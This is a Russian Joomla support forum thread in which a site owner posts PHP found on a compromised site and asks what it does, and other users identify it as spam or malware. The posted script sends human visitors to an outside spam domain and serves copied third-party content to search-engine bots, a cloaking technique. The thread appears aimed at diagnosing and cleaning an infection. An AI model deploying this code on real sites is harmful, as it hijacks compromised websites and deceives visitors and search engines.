Форум русской поддержки Joomla!® CMS
03.12.2016, 00:08:51 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1]   Вниз
  Добавить закладку  |  Печать  
Автор

не могу понять что за скрипт может кто подскажет

 (Прочитано 199 раз)
0 Пользователей и 1 Гость смотрят эту тему.
katalog_2003
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 66


« : 18.09.2016, 00:03:16 »

не могу понять что за скрипт может кто подскажет  спасибо

<?php


$tmp = "?" . strtolower($_SERVER['HTTP_USER_AGENT']);
if((strpos($tmp, 'bot')!= true)){
header('location:http://deskincream2016.lori-ellis.com/');
exit;
}


function gethttpcnt($url,$username = '',$password = '',$timeout = 10){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$cnt = curl_exec($ch);
curl_close($ch);
return $cnt;
}
 $fromsite="http://www.fitforfun.de/beauty-wellness/haut-haare/pigmentflecken/hautprobleme_aid_5500.html";
 $website="http://www.fitforfun.de/";

 $ss=$_SERVER['PHP_SELF'];
 $ss=str_replace("index.php","",$ss);
 $otherstring=$fromsite;
 
 $content=gethttpcnt($otherstring);
 $content=str_replace("\"images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../Images/","\"" . $website . "/images/",$content);
 $content=str_replace("\"includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"/includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"../includes/templates/","\"" . $website . "/includes/templates/",$content);
 $content=str_replace("\"min/","\"" . $website . "min/",$content);
 $content=str_replace("\"media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../media/","\"" . $website . "/images/",$content);
 $content=str_replace("\"css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"/css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"../css/","\"" . $website . "/css/",$content);
 $content=str_replace("\"skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../skin/","\"" . $website . "/images/",$content);
 $content=str_replace("\"js/","\"" . $website . "/images/",$content);
 $content=str_replace("\"/js/","\"" . $website . "/images/",$content);
 $content=str_replace("\"../js/","\"" . $website . "/images/",$content);
 $content=str_replace("'images/","'" . $website . "/images/",$content);
 $content=str_replace("'/images/","'" . $website . "/images/",$content);
 $content=str_replace("'../images/","'" . $website . "/images/",$content);
 $content=str_replace("'Images/","'" . $website . "/images/",$content);
 $content=str_replace("'/Images/","'" . $website . "/images/",$content);
 $content=str_replace("'../Images/","'" . $website . "/images/",$content);
 $content=str_replace("'includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'/includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'../includes/templates/","'" . $website . "/includes/templates/",$content);
 $content=str_replace("'min/","'" . $website . "min/",$content);
 $content=str_replace("'media/","'" . $website . "/images/",$content);
 $content=str_replace("'/media/","'" . $website . "/images/",$content);
 $content=str_replace("'../media/","'" . $website . "/images/",$content);
 $content=str_replace("'skin/","'" . $website . "/images/",$content);
 $content=str_replace("'/skin/","'" . $website . "/images/",$content);
 $content=str_replace("'../skin/","'" . $website . "/images/",$content);
 $content=str_replace("'js/","'" . $website . "/images/",$content);
 $content=str_replace("'/js/","'" . $website . "/images/",$content);
 $content=str_replace("'../js/","'" . $website . "/images/",$content);
 $content=str_replace('href="/','href="' . $website,$content);
 $content=str_replace('"' . $fromsite . '"','"' . $_SERVER['HTTP_HOST'] . $ss . '"',$content);
 $content=str_replace("'" . $fromsite . "'","'" . $_SERVER['HTTP_HOST'] . $ss . "'",$content);
 echo $content;
?>
Записан
robert
Профи
********

Репутация: +342/-11
Offline Offline

Пол: Мужской
Сообщений: 3566


« Ответ #1 : 18.09.2016, 01:15:52 »

Вы лучше сначала расскажите, чем этот скрипт вам интересен, потому что, скорее всего, он создан не для благих целей. Он вам как-то вредит или вы хотите его использовать?
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #2 : 18.09.2016, 02:32:41 »

Шаблон качался с варезного ресурса? Вот и скрипт спамерский. Либо просто скрытая реклама либо бекдор глубже лежит
Записан
draff
Практически профи
*******

Репутация: +161/-5
Offline Offline

Пол: Мужской
Сообщений: 2649


step by step


« Ответ #3 : 18.09.2016, 08:59:07 »

Ну почему сразу варезный. Я встречал и в бесплатных расширениях рекламу.
В скрипте много вставок на сайты. И другой вопрос- дата создания скрипта, и с каким расширением этот скрипт появился в файлах сайта. Или хакер получил доступ к хостингу - и внедрил этот скрипт.
Записан
beliyadm
Профи
********

Репутация: +1566/-61
Offline Offline

Пол: Мужской
Сообщений: 8110


Севастополь == Россия


« Ответ #4 : 18.09.2016, 14:04:47 »

Ну почему сразу варезный. Я встречал и в бесплатных расширениях рекламу.
В бесплатных расширениях реклама открытая, а не укрыта base64 или другими скрытыми способами. Я лично в бесплатных никогда не видел рекламы, кроме ссылки на сайт разработчика.
Записан
katalog_2003
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 66


« Ответ #5 : 18.09.2016, 20:10:23 »

Сайт был передан на оптимизацию вскрываю а там папок ba123 и т.д 3500 шт index.php в нутри
Записан
wishlight
Профи
********

Репутация: +200/-1
Offline Offline

Пол: Мужской
Сообщений: 3474


skype aqaus.com


« Ответ #6 : 18.09.2016, 20:52:53 »

Явно ничего хорошего. Лечите сайт.
Записан
katalog_2003
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 66


« Ответ #7 : 18.09.2016, 21:42:07 »

HaCkeD By Dr.Silnt HilL не знаете что это
Записан
dmitry_stas
Профи
********

Репутация: +794/-4
Online Online

Сообщений: 7732



« Ответ #8 : 18.09.2016, 21:45:43 »

Явно ничего хорошего. Лечите сайт.
Записан
robert
Профи
********

Репутация: +342/-11
Offline Offline

Пол: Мужской
Сообщений: 3566


« Ответ #9 : 19.09.2016, 01:21:31 »

HaCkeD By Dr.Silnt HilL не знаете что это
"Доктор Silnt HilL тебя поимел" - что-то вроде этого. Хотя он не такой уж крутой, судя по коду.
Записан
Страниц: [1]   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet